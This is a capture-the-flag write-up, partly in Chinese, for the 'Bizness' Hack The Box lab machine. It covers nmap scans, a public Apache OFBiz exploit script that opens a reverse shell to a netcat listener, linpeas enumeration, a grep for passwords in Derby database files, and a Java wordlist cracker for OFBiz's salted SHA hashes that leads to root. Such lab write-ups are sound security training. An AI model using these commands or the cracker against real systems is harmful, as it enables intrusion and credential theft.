Bizness
Machine:Linux
Level:Easy
Nmap
└─# nmap -p- 10.10.11.252
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 23:37 EST
Nmap scan report for 10.10.11.252
Host is up (0.24s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
8000/tcp filtered http-alt
36823/tcp open unknown
39847/tcp open unknown
└─# nmap -p 80,443,8000,36823,39847 -sCV -A 10.10.11.252
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 23:40 EST
Nmap scan report for 10.10.11.252
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp open ssl/http nginx 1.18.0
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after: 2328-11-10T20:03:40
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg:
|_ http/1.1
|_http-title: Did not follow redirect to https://bizness.htb/
8000/tcp filtered http-alt
36823/tcp open tcpwrapped
39847/tcp open tcpwrapped
User Access
Apache OFBiz CVE → ofbiz
访问网页发现在使用的是Apache OFBiz,查找CVE打就可以了。
└─# python3 exp.py https://bizness.htb shell LHOST:LPOST
└─# nc -lnvp 1234
listening on [any] 1234 ...
ofbiz@bizness:/opt/ofbiz$
Root Access
linpeas.sh → derby Info
上线MSF并使用linpeas.sh收集信息,在近五分钟修改文件发现该系统使用了derby数据库,在该数据库的介绍中可以知道sag0目录下存储着用户表、系统表和索引。
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/journal/5e1bbbd9ec5d475ca2f8372a972bd975/user-1001.journal
/var/log/journal/5e1bbbd9ec5d475ca2f8372a972bd975/system.journal
/var/log/syslog
/var/log/daemon.log
/opt/ofbiz/runtime/data/derby/ofbiz/seg0/c57c1.dat
/opt/ofbiz/runtime/data/derby/ofbiz/log/log31.dat
/opt/ofbiz/runtime/logs/error.log
/opt/ofbiz/runtime/logs/ofbiz.log
/opt/ofbiz/runtime/logs/access_log..2024-01-07
/opt/ofbiz/.gradlew.swp
/opt/ofbiz/index.html.1
/tmp/hsperfdata_ofbiz/854
/tmp/hsperfdata_ofbiz/585
/tmp/hsperfdata_ofbiz/724
对/opt/ofbiz/runtime/data/derby/ofbiz/seg0/下的.dat数据文件查看在c54d0.dat
<map-Value>
<eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" createdTxStamp="2023-12-16 03:40:23.445" currentPassword="[deleted]" enabled="Y" hasLoggedOut="N" lastUpdatedStamp="2023-12-16 03:44:54.272" lastUpdatedTxStamp="2023-12-16 03:44:54.213" requirePasswordChange="N" userLoginId="admin"/>
</map-Value>
也可以在同目录下使用
grep -arin -o -E '(\w+\W+){0,5}password(\W+\w+){0,5}' .命令进行搜索
Code Audit
查看项目源码或者在路径/opt/ofbiz/framework/base/src/main/java/org/apache/ofbiz/base/crypto下查看源码(Github在146行左右),根据得到的Hash值可以知道hashType=SHA、salt=d,后面的bytes部分可以通过已知的部分爆破。
public static String cryptBytes(String hashType, String salt, byte[] bytes) {
if (hashType == null) {
hashType = "SHA";
}
if (salt == null) {
salt = RandomStringUtils.random(SECURE_RANDOM.nextInt(15) + 1, CRYPT_CHAR_SET);
}
StringBuilder sb = new StringBuilder();
sb.append("$").append(hashType).append("$").append(salt).append("$");
sb.append(getCryptedBytes(hashType, salt, bytes));
return sb.toString();
}
private static String getCryptedBytes(String hashType, String salt, byte[] bytes) {
try {
MessageDigest messagedigest = MessageDigest.getInstance(hashType);
messagedigest.update(salt.getBytes(StandardCharsets.UTF_8));
messagedigest.update(bytes);
return Base64.encodeBase64URLSafeString(messagedigest.digest()).replace('+', '.');
} catch (NoSuchAlgorithmException e) {
throw new GeneralRuntimeException("Error while comparing password", e);
}
}
EXP:
import org.apache.commons.codec.binary.Base64;
import java.io.BufferedReader;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.io.IOException;
import java.io.FileReader;
public class Main {
public static void main(String[] args) {
String filePath = "~\\rockyou.txt";
System.out.println(StandardCharsets.UTF_8);
try (BufferedReader reader = new BufferedReader(new FileReader(filePath))) {
String line;
while ((line = reader.readLine()) != null) {
byte[] bytes = line.getBytes(StandardCharsets.UTF_8);
String hash = cryptBytes("SHA", "d", bytes);
if (hash.equals("[deleted]")){
System.out.println("[+] Password: " + line);
break;
}
}
} catch (IOException ignored) {}
}
public static String cryptBytes(String hashType, String salt, byte[] bytes) {
StringBuilder sb = new StringBuilder();
sb.append("$").append(hashType).append("$").append(salt).append("$");
sb.append(getCryptedBytes(hashType, salt, bytes));
return sb.toString();
}
private static String getCryptedBytes(String hashType, String salt, byte[] bytes) {
try {
MessageDigest messagedigest = MessageDigest.getInstance("SHA");
messagedigest.update("d".getBytes(StandardCharsets.UTF_8));
messagedigest.update(bytes);
return Base64.encodeBase64URLSafeString(messagedigest.digest()).replace('+', '.');
} catch (NoSuchAlgorithmException e) {
throw new RuntimeException("Error while comparing password", e);
}
}
}
EXP → Root
得到密码就可以切换为Root。
/opt/ofbiz/framework/base/src/main/java/org/apache/ofbiz/base/crypto$ su
Password: [password]
whoami
root